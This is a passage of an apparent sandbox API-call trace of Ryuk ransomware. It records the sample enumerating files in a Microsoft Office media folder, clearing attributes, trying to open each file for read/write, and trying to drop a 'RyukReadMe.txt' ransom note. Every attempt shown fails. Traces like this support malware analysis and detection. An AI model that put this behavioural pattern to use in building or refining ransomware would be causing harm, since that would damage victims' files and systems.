Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML", dwFileAttributes=0x80) returned 0 [0135.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.653] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.653] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0135.653] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0135.653] SetLastError (dwErrCode=0x0) [0135.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.653] GetLastError () returned 0x5 [0135.653] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.653] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.653] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.653] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW", dwFileAttributes=0x80) returned 0 [0135.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.654] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.654] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.654] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.654] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.654] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV", dwFileAttributes=0x80) returned 0 [0135.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\elphrg01.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.660] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.660] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF", dwFileAttributes=0x80) returned 0 [0135.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0088542.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.661] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF", dwFileAttributes=0x80) returned 0 [0135.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0090070.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.662] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.662] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF", dwFileAttributes=0x80) returned 0 [0135.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090386.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0090386.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.663] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.663] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.663] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF", dwFileAttributes=0x80) returned 0 [0135.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149407.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149407.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.664] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF", dwFileAttributes=0x80) returned 0 [0135.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149481.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149481.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.665] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF", dwFileAttributes=0x80) returned 0 [0135.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149627.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149627.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.665] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF", dwFileAttributes=0x80) returned 0 [0135.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0149887.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.666] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.666] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.666] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF", dwFileAttributes=0x80) returned 0 [0135.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0157763.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.667] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.667] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.667] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF", dwFileAttributes=0x80) returned 0 [0135.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0157995.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.667] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.667] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.667] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF", dwFileAttributes=0x80) returned 0 [0135.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0158007.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.668] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF", dwFileAttributes=0x80) returned 0 [0135.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183168.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0183168.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.669] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.669] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.669] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF", dwFileAttributes=0x80) returned 0 [0135.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183290.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0183290.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.669] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.669] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.669] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF", dwFileAttributes=0x80) returned 0 [0135.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0183328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.670] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.670] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.670] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF", dwFileAttributes=0x80) returned 0 [0135.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0185604.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.670] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.670] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.671] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF", dwFileAttributes=0x80) returned 0 [0135.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0186002.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.671] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.671] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.672] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.672] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.672] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF", dwFileAttributes=0x80) returned 0 [0135.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186348.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0186348.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.672] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.672] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.672] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.672] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.672] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF", dwFileAttributes=0x80) returned 0 [0135.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0187423.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0187423.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.673] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF", dwFileAttributes=0x80) returned 0 [0135.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195384.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0195384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.673] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF", dwFileAttributes=0x80) returned 0 [0135.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195534.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0195534.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.674] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.674] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF", dwFileAttributes=0x80) returned 0 [0135.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0195812.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0195812.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.675] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.675] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.675] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF", dwFileAttributes=0x80) returned 0 [0135.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196164.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0196164.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.675] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.675] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.676] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF", dwFileAttributes=0x80) returned 0 [0135.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196374.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0196374.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.676] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.676] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.676] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF", dwFileAttributes=0x80) returned 0 [0135.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0196400.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.677] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.677] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.677] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF", dwFileAttributes=0x80) returned 0 [0135.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199036.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.678] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF", dwFileAttributes=0x80) returned 0 [0135.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199283.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.678] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.678] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF", dwFileAttributes=0x80) returned 0 [0135.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199549.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199549.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.679] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.679] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) 